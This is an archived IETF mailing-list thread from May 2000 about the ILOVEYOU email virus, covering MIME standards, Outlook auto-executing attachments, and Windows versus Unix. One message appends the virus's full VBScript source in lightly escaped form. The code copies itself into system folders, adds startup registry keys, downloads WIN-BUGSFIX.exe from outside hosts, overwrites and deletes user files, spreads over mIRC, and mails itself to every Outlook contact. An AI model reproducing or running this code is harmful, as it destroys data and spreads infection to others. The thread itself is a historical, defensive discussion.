q lines(n)=3Dchr(34)+lines(n)+chr(34)&"&vbcrlf& _"
q end if
q next
q set b=3Dfso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
q b.close
q set d=3Dfso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
q d.write dt5
q d.write join(lines,vbcrlf)
q d.write vbcrlf
q d.write dt6
q d.close
q end sub
q ------_=_NextPart_000_01BFB5DE.957A65A0--
>From owner-ietf-outbound Thu May 4 14:10:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA13128
for [EMAIL PROTECTED]; Thu, 4 May 2000 14:10:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA13057
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 14:06:24 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta0/8.11.0.Beta0) with ESMTP id e44I6Eh25570;
Thu, 4 May 2000 14:06:14 -0400
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: exmh version 2.1.1 10/15/1999
To: "Michael H. Warfield" <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
In-reply-to: Your message of "Thu, 04 May 2000 10:41:34 EDT."
<[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 04 May 2000 14:06:09 -0400
X-Loop: [EMAIL PROTECTED]
On Thu, 04 May 2000 10:41:34 EDT, "Michael H. Warfield" said:
> Your mailer may be able to display it as text (mine, Mutt, certainly
> can) but it is definitely propagating as type application/octet-stream, not
> text/plain. Wish we could lay that one on them, but we can't.
Mea Culpa - seems *MY* MUA decided to be naughty and flag it as a
text/plain, so I reported it as such. I'll shut up now while I
go and beat said MUA into submission and make it not lie to me anymore.
Yes, the data as it was actually stored in the message store was an
application/octet-stream. However, that's not much better, security-wise.
(Although at least with an "application/foobar", you know that it's designed
for application foobar, and can appropriately sandbox your foobar-viewer).
--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Thu May 4 14:20:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA13317
for [EMAIL PROTECTED]; Thu, 4 May 2000 14:20:02 -0400 (EDT)
Received: from ds.xpedio.com ([195.242.45.180])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA13270
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 14:17:43 -0400 (EDT)
Received: from siddharta007.nou.com ([193.150.223.250]) by ds.xpedio.com
(Netscape Messaging Server 3.62) with ESMTP id 396
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 20:23:39 +0200
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Thu, 04 May 2000 20:16:56 +0200
To: [EMAIL PROTECTED]
From: Peter =?iso-8859-1?Q?N=F5u?= <[EMAIL PROTECTED]>
Subject: value of standards
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"; format=flowed
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id OAA13270
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
At 18:02 2000-05-04 Lillian Komlossy wrote:
>The whole world will not switch over to Unix
>- the average user will always be more confortable with Windows
The whole world might not be comfortable with Windows but many,
many of my collegues around the world work at companies where
they have absolutely no say on the choise of either OS or email
client. The CIO/CTO (blame him or her instead!) (simply) made
the (safest) decision and went for the Exchange/Outlook combo
with added Office integration :-) And the users had no say whatsoever.
Rather than making fun of or scream "stupid", why don´t we keep
developing and arguing for standard based 'solutions': because
that's what ms is selling with a fair amount of success. Maybe
TCO (total cost of ownership) calculations comparing "standard
combos" with MS offering, taking virus downtime into account would help?
/peter
---------------------------------------------------------------
"The sheepdog is shown its possibilities, he learns what life is
like for a good dog and is invited to walk in a rational world
whose farthest boundaries are defined by grace."
--Donald McCaig, Nop's Hope
[EMAIL PROTECTED] Nöu How, Firma
Tel +46 70 515 7602 Stadshagsplan 10
Fax +46 70 617 1602 112 50 Stockholm
Cellular +46 70 515 7602
>From owner-ietf-outbound Thu May 4 14:40:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA13707
for [EMAIL PROTECTED]; Thu, 4 May 2000 14:40:02 -0400 (EDT)
Received: from tsx-prime.MIT.EDU (TSX-PRIME.MIT.EDU [18.86.0.76])
by ietf.org (8.9.1a/8.9.1a) with SMTP id OAA13454
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 14:30:35 -0400 (EDT)
Received: by tsx-prime.MIT.EDU
with sendmail-SMI-8.6/1.2, id OAA05848; Thu, 4 May 2000 14:30:23 -0400
Date: Thu, 4 May 2000 14:30:23 -0400
Message-Id: <[EMAIL PROTECTED]>
From: "Theodore Y. Ts'o" <[EMAIL PROTECTED]>
To: "Donald E. Eastlake 3rd" <[EMAIL PROTECTED]>
CC: <[EMAIL PROTECTED]>
In-reply-to: Donald E. Eastlake 3rd's message of Thu, 04 May 2000 10:48:12
-0400, <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
Phone: (781) 391-3464
X-Loop: [EMAIL PROTECTED]
Date: Thu, 04 May 2000 10:48:12 -0400
From: "Donald E. Eastlake 3rd" <[EMAIL PROTECTED]>
The whole world does not run software which is a good culture medium
for email viruses. I mostly use nice old UNIX software and it would
take a number of extra steps on my part for some embdedded virus to
get a chance to run. If your software automatically executes stuff
in attachments, you need to change your software, not develope a list
of subject lines you are freightened of.
You need to get with program! Having software which is a good culture
medium for e-mail virus is part of the innovative new features which
customers are demanding. Clearly, you need report to re-education camps
to learn why it's important to let the government let companies have to
freedom to innovate wonderful things like vbscript. :-)
- Ted
>From owner-ietf-outbound Thu May 4 14:50:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA13912
for [EMAIL PROTECTED]; Thu, 4 May 2000 14:50:02 -0400 (EDT)
Received: from ginger.lcs.mit.edu (ginger.lcs.mit.edu [18.26.0.82])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA13647
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 14:38:44 -0400 (EDT)
Received: (from jnc@localhost)
by ginger.lcs.mit.edu (8.9.1/8.9.1) id OAA02813;
Thu, 4 May 2000 14:38:09 -0400
Date: Thu, 4 May 2000 14:38:09 -0400
From: "J. Noel Chiappa" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
Cc: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
> Actually what happened, was I received this virus from a trusted friend
> ... I am just glad that I didn't have any e-mail lists in my "address
> book"
That's actually an interesting bit of "social engineering" on the part of the
virus writer - using the address book as a source of places to propogate to
means that those people who get it are *exactly* the set of people who know
you, and are thus more likely to open a random unexpected attachment...
Noel
>From owner-ietf-outbound Thu May 4 15:00:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA14096
for [EMAIL PROTECTED]; Thu, 4 May 2000 15:00:03 -0400 (EDT)
Received: from vrtx.co.uk ([EMAIL PROTECTED] [195.224.63.4])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA13858
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 14:45:54 -0400 (EDT)
Received: from localhost (james@localhost)
by vrtx.co.uk (8.9.3/8.8.8) with ESMTP id TAA23437;
Thu, 4 May 2000 19:53:24 +0100
Date: Thu, 4 May 2000 19:53:24 +0100 (BST)
From: A James Lewis <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
To: Lillian Komlossy <[EMAIL PROTECTED]>
cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
The whole world will use what they are presented with.... the difference
between Win3.1 and Win95 is far greater than the difference between Win95
and GNOME or KDE... so actually it's only software availability thats
holding back IS departments the world over!
If MS gets split, we could have Office for UNIX sooner rather than
later too!
On Thu, 4 May 2000, Lillian Komlossy wrote:
> Donald,
>
> The whole world will not switch over to Unix
> - the average user will always be more confortable with Windows
> unless Unix will at one point offer the same seamless user-friendliness.
> So it will always be a problem, one which cannot be solved by telling
> others not to use what they've accustomed to - and one which cannot be
> ignored.
>
>
> Lillian Komlossy
> Site Manager
> http://www.dmnews.com
> http://www.imarketingnews.com
> (212) 925-7300 ext. 232
>
>
> -----Original Message-----
> From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, May 04, 2000 10:48 AM
> To: [EMAIL PROTECTED]
> Subject: Re: VIRUS WARNING
>
>
>
> The whole world does not run software which is a good culture medium
> for email viruses. I mostly use nice old UNIX software and it would
> take a number of extra steps on my part for some embdedded virus to
> get a chance to run. If your software automatically executes stuff
> in attachments, you need to change your software, not develope a list
> of subject lines you are freightened of.
>
> Donald
>
> From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
> Date: Thu, 4 May 2000 09:27:19 -0400
> Message-ID: <00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
> Content-Type: text/plain;
> charset="iso-8859-1"
> Content-Transfer-Encoding: 7bit
> X-MSMail-Priority: Normal
> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
> Importance: Normal
> In-Reply-To: <[EMAIL PROTECTED]>
> Content-Transfer-Encoding: 7bit
> X-Loop: [EMAIL PROTECTED]
> Content-Transfer-Encoding: 7bit
> >The is an e-mail virus going around. The subject of the e-mail is
> >ILOVEYOU...I suggest you delete it the moment you receive it.
> >
> >-Scot Mc Pherson, N2UPA
> >-Sr. Network Analyst
> >-ClearAccess Communications
> >-Ph: 941.744.5757 ext. 210
> >-Fax: 941.744.0629
> >-mailto:[EMAIL PROTECTED]
> >-http://www.clearaccess.net
> >
>
A. James Lewis ([EMAIL PROTECTED])
Don't throw your computers out of the windows,
throw the Windows(tm) out of your computers.
>From owner-ietf-outbound Thu May 4 15:30:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA14740
for [EMAIL PROTECTED]; Thu, 4 May 2000 15:30:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA14615
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 15:25:39 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id PAA02220;
Thu, 4 May 2000 15:25:37 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: Peter =?iso-8859-1?Q?N=F5u?= <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: value of standards
In-reply-to: Your message of "Thu, 04 May 2000 20:16:56 +0200."
<[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 15:25:37 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> Rather than making fun of or scream "stupid", why don't we keep
> developing and arguing for standard based 'solutions':
You mean like RFC 2046?
The recommended action for an implementation that receives an
"application/octet-stream" entity is to simply offer to put the data
in a file, with any Content-Transfer-Encoding undone, or perhaps to
use it as input to a user-specified process.
Gee, I sure am glad that the vendor of this software followed the standard
and offered to save this body part to a file.
(note that it says "user-specified process" as opposed to the insecure
default action so graciously provided by the vendor)
RFC 2046 also says (section 9):
Implementors should pay special attention to the
security implications of any media types that can cause the remote
execution of any actions in the recipient's environment. In such
cases, the discussion of the "application/postscript" type may serve
as a model for considering other media types with remote execution
capabilities.
and the section on application/postscript does indeed describe risks that
are similar to those in visual basic.
Perhaps unfortunately, RFC 2046 doesn't come right out and say
"DON'T EXECUTE CONTENT IN EMAIL MESSAGES".
Then again, it doesn't say DON'T CUT YOUR CUSTOMER'S ARM OFF either.
not that it would matter if it did...
Keith
>From owner-ietf-outbound Thu May 4 15:40:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA15082
for [EMAIL PROTECTED]; Thu, 4 May 2000 15:40:02 -0400 (EDT)
Received: from ztxmail04.ztx.compaq.com (ztxmail04.ztx.compaq.com [161.114.1.208])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA14639
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 15:25:50 -0400 (EDT)
Received: by ztxmail04.ztx.compaq.com (Postfix, from userid 12345)
id 184E65B1; Thu, 4 May 2000 14:25:21 -0500 (CDT)
Received: from excreo-gh01.reo.dec.com (unknown [16.41.128.40])
by ztxmail04.ztx.compaq.com (Postfix) with ESMTP
id 3BEFC951; Thu, 4 May 2000 14:25:20 -0500 (CDT)
Received: by EXCREO-GH01 with Internet Mail Service (5.5.2650.21)
id <K26WV28Z>; Thu, 4 May 2000 20:25:18 +0100
Message-ID: <[EMAIL PROTECTED]>
From: "Parkinson, Jonathan" <[EMAIL PROTECTED]>
To: "'Magnus Danielson'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: RE: THe Value Of Following Standards... (was Re: VIRUS WARNING)
Date: Thu, 4 May 2000 18:06:26 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id PAA14639
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
This is what happens when a software gient makes up the rules as they go
along, all in the name of making the umm user err happy, Now i will spend
£30.00 on anti-virus software :-)
-----Original Message-----
From: Magnus Danielson [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 4:24 PM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
From: [EMAIL PROTECTED]
Subject: THe Value Of Following Standards... (was Re: VIRUS WARNING)
Date: Thu, 04 May 2000 10:46:33 -0400
> On Thu, 04 May 2000 09:27:19 EDT, Scot Mc Pherson
<[EMAIL PROTECTED]> said:
> > The is an e-mail virus going around. The subject of the e-mail is
> > ILOVEYOU...I suggest you delete it the moment you receive it.
>
> Somebody didn't read RFC2046, section 2, where it talks about text/plain
> being *TEXT*, and application/* being *application data*.
>
> So if your e-mail software is opening it and feeding it to Visual Basic
> just because it's tagged .vbs even though it's a text/plain, you're
> violating the RFCs.
>
> I'm not pointing fingers, but.... ;)
You are missing the point here, this is user friendliness, the user is
allowed
to do whatever he/she wants, even in others equipment with others data. ;)
It does make box managment so much easier ;)
Cheers,
Magnus
>From owner-ietf-outbound Thu May 4 15:50:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA15298
for [EMAIL PROTECTED]; Thu, 4 May 2000 15:50:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA14664
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 15:27:13 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id PAA02277;
Thu, 4 May 2000 15:27:01 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: "Theodore Y. Ts'o" <[EMAIL PROTECTED]>
cc: "Donald E. Eastlake 3rd" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Thu, 04 May 2000 14:30:23 EDT."
<[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 15:27:01 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> Clearly, you need report to re-education camps
> to learn why it's important to let the government let companies have to
> freedom to innovate wonderful things like vbscript. :-)
not to mention gratuitous incompatibilites to Kerberos.
Keith
>From owner-ietf-outbound Thu May 4 16:03:55 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA15616
for [EMAIL PROTECTED]; Thu, 4 May 2000 16:03:47 -0400 (EDT)
Received: from apollo.dmnews.com (mail.dmnews.com [204.141.161.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA15104
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 15:40:17 -0400 (EDT)
Received: by mail.dmnews.com with Internet Mail Service (5.5.2448.0)
id <HNLHM4CC>; Thu, 4 May 2000 15:46:46 -0400
Message-ID: <[EMAIL PROTECTED]>
From: Lillian Komlossy <[EMAIL PROTECTED]>
To: "'Donald E. Eastlake 3rd'" <[EMAIL PROTECTED]>
Cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: RE: Security insanity
Date: Thu, 4 May 2000 15:46:45 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
I agree with you - anything that is happening automatically and without
the chance for the user to say "yes" or "no thank you" is calling for this
kind of attacks. It should be part of ActiveX or any other technology.
Nothing should autoexecute. Unfortunately a lot of e-commerce and software
companies are guilty of peppering the Internet with "auto-updates",(see AOL)
"checks" (see Windowsupdate.com), cookies, (Need I say!) etc.. which are all
open invitations for break-in and worse.
A strict standard is very much called for, IMO we must find the fine line
between user-friendly and vulnerable.
Lillian Komlossy
Site Manager
http://www.dmnews.com
http://www.imarketingnews.com
(212) 925-7300 ext. 232
-----Original Message-----
From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 1:54 PM
To: [EMAIL PROTECTED]
Subject: Security insanity
It's not switching to UNIX, its avoiding secuirty insanity like
AcitveX, self-extracting binaries, automatically executing attachemnts
on opening on opening mail, as apparently Outlook does, etc. A few
seconds thought would tell anyone with a clue what a bad idea these
are.
It is just insane that vast parts of the computing capacity of the world
can be damaged this badly and this trivially.
Donald
PS: Appended below is the virus in a hopefully non-virulent form.
>Donald,
>The whole world will not switch over to Unix
>- the average user will always be more confortable with Windows
>unless Unix will at one point offer the same seamless user-friendliness.
>So it will always be a problem, one which cannot be solved by telling
>others not to use what they've accustomed to - and one which cannot be
>ignored.
>
>Lillian Komlossy
>Site Manager
>http://www.dmnews.com
>http://www.imarketingnews.com
>(212) 925-7300 ext. 232
=====================================================================
Donald E. Eastlake 3rd [EMAIL PROTECTED]
140 Forest Avenue +1 914-276-2668(h)
Hudson, MA 01749 USA +1 508-261-5434(w)
q MIME-Version: 1.0
q X-Mailer: Internet Mail Service (5.5.2448.0)
q Content-Type: multipart/mixed;
q boundary="----_=_NextPart_000_01BFB5DE.957A65A0"
q
q This message is in MIME format. Since your mail reader does not understand
q this format, some or all of this message may not be legible.
q
q ------_=_NextPart_000_01BFB5DE.957A65A0
q Content-Type: text/plain
q
q
q kindly check the attached LOVELETTER coming from me.
q
q
q ------_=_NextPart_000_01BFB5DE.957A65A0
q Content-Type: application/octet-stream;
q name="LOVE-LETTER-FOR-YOU.TXT.vbs"
q Content-Transfer-Encoding: quoted-printable
q Content-Disposition: attachment;
q filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
q
q rem barok -loveletter(vbe) <i hate go to school>
q rem by: spyder / [EMAIL PROTECTED] / @GRAMMERSoft
Group / =
q Manila,Philippines
q On Error Resume Next
q dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
q eq=3D""
q ctr=3D0
q Set fso =3D CreateObject("Scripting.FileSystemObject")
q set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)
q vbscopy=3Dfile.ReadAll
q main()
q sub main()
q On Error Resume Next
q dim wscr,rr
q set wscr=3DCreateObject("WScript.Shell")
q rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
q Scripting Host\Settings\Timeout")
q if (rr>=3D1) then
q wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
q Host\Settings\Timeout",0,"REG_DWORD"
q end if
q Set dirwin =3D fso.GetSpecialFolder(0)
q Set dirsystem =3D fso.GetSpecialFolder(1)
q Set dirtemp =3D fso.GetSpecialFolder(2)
q Set c =3D fso.GetFile(WScript.ScriptFullName)
q c.Copy(dirsystem&"\MSKernel32.vbs")
q c.Copy(dirwin&"\Win32DLL.vbs")
q c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
q regruns()
q html()
q spreadtoemail()
q listadriv()
q end sub
q sub regruns()
q On Error Resume Next
q Dim num,downread
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern=
q el32",dirsystem&"\MSKernel32.vbs"
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService=
q s\Win32DLL",dirwin&"\Win32DLL.vbs"
q downread=3D""
q downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
q Explorer\Download Directory")
q if (downread=3D"") then
q downread=3D"c:\"
q end if
q if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then
q Randomize
q num =3D Int((4 * Rnd) + 1)
q if num =3D 1 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm=
q hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
q elseif num =3D 2 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw=
q erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
q elseif num =3D 3 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd=
q QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
q elseif num =3D 4 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD=
q GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN=
q -BUGSFIX.exe"
q end if
q end if
q if (fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU=
q GSFIX",downread&"\WIN-BUGSFIX.exe"
q regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet =
q Explorer\Main\Start Page","about:blank"
q end if
q end sub
q sub listadriv
q On Error Resume Next
q Dim d,dc,s
q Set dc =3D fso.Drives
q For Each d in dc
q If d.DriveType =3D 2 or d.DriveType=3D3 Then
q folderlist(d.path&"\")
q end if
q Next
q listadriv =3D s
q end sub
q sub infectfiles(folderspec) =20
q On Error Resume Next
q dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
q set f =3D fso.GetFolder(folderspec)
q set fc =3D f.Files
q for each f1 in fc
q ext=3Dfso.GetExtensionName(f1.path)
q ext=3Dlcase(ext)
q s=3Dlcase(f1.name)
q if (ext=3D"vbs") or (ext=3D"vbe") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q elseif(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") =
q or (ext=3D"sct") or (ext=3D"hta") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q bname=3Dfso.GetBaseName(f1.path)
q set cop=3Dfso.GetFile(f1.path)
q cop.copy(folderspec&"\"&bname&".vbs")
q fso.DeleteFile(f1.path)
q elseif(ext=3D"jpg") or (ext=3D"jpeg") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q set cop=3Dfso.GetFile(f1.path)
q cop.copy(f1.path&".vbs")
q fso.DeleteFile(f1.path)
q elseif(ext=3D"mp3") or (ext=3D"mp2") then
q set mp3=3Dfso.CreateTextFile(f1.path&".vbs")
q mp3.write vbscopy
q mp3.close
q set att=3Dfso.GetFile(f1.path)
q att.attributes=3Datt.attributes+2
q end if
q if (eq<>folderspec) then
q if (s=3D"mirc32.exe") or (s=3D"mlink32.exe") or (s=3D"mirc.ini") or =
q (s=3D"script.ini") or (s=3D"mirc.hlp") then
q set scriptini=3Dfso.CreateTextFile(folderspec&"\script.ini")
q scriptini.WriteLine "[script]"
q scriptini.WriteLine ";mIRC Script"
q scriptini.WriteLine "; Please dont edit this script... mIRC will =
q corrupt, if mIRC will"
q scriptini.WriteLine " corrupt... WINDOWS will affect and will not =
q run correctly. thanks"
q scriptini.WriteLine ";"
q scriptini.WriteLine ";Khaled Mardam-Bey"
q scriptini.WriteLine ";http://www.mirc.com"
q scriptini.WriteLine ";"
q scriptini.WriteLine "n0=3Don 1:JOIN:#:{"
q scriptini.WriteLine "n1=3D /if ( $nick =3D=3D $me ) { halt }"
q scriptini.WriteLine "n2=3D /.dcc send $nick =
q "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
q scriptini.WriteLine "n3=3D}"
q scriptini.close
q eq=3Dfolderspec
q end if
q end if
q next =20
q end sub
q sub folderlist(folderspec) =20
q On Error Resume Next
q dim f,f1,sf
q set f =3D fso.GetFolder(folderspec) =20
q set sf =3D f.SubFolders
q for each f1 in sf
q infectfiles(f1.path)
q folderlist(f1.path)
q next =20
q end sub
q sub regcreate(regkey,regvalue)
q Set regedit =3D CreateObject("WScript.Shell")
q regedit.RegWrite regkey,regvalue
q end sub
q function regget(value)
q Set regedit =3D CreateObject("WScript.Shell")
q regget=3Dregedit.RegRead(value)
q end function
q function fileexist(filespec)
q On Error Resume Next
q dim msg
q if (fso.FileExists(filespec)) Then
q msg =3D 0
q else
q msg =3D 1
q end if
q fileexist =3D msg
q end function
q function folderexist(folderspec)
q On Error Resume Next
q dim msg
q if (fso.GetFolderExists(folderspec)) then
q msg =3D 0
q else
q msg =3D 1
q end if
q fileexist =3D msg
q end function
q sub spreadtoemail()
q On Error Resume Next
q dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
q set regedit=3DCreateObject("WScript.Shell")
q set out=3DWScript.CreateObject("Outlook.Application")
q set mapi=3Dout.GetNameSpace("MAPI")
q for ctrlists=3D1 to mapi.AddressLists.Count
q set a=3Dmapi.AddressLists(ctrlists)
q x=3D1
q regv=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
q if (regv=3D"") then
q regv=3D1
q end if
q if (int(a.AddressEntries.Count)>int(regv)) then
q for ctrentries=3D1 to a.AddressEntries.Count
q malead=3Da.AddressEntries(x)
q regad=3D""
q regad=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&male=
q ad)
q if (regad=3D"") then
q set male=3Dout.CreateItem(0)
q male.Recipients.Add(malead)
q male.Subject =3D "ILOVEYOU"
q male.Body =3D vbcrlf&"kindly check the attached LOVELETTER coming from =
q me."
q male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
q male.Send
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
q end if
q x=3Dx+1
q next
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
q else
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
q end if
q next
q Set out=3DNothing
q Set mapi=3DNothing
q end sub
q sub html
q On Error Resume Next
q dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
q dta1=3D"<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META =
q NAME=3D@-@Generator@-@ CONTENT=3D@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& =
q _
q "<META NAME=3D@-@Author@-@ CONTENT=3D@-@spyder ?-? [EMAIL PROTECTED] ?-? =
q @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& =
q _
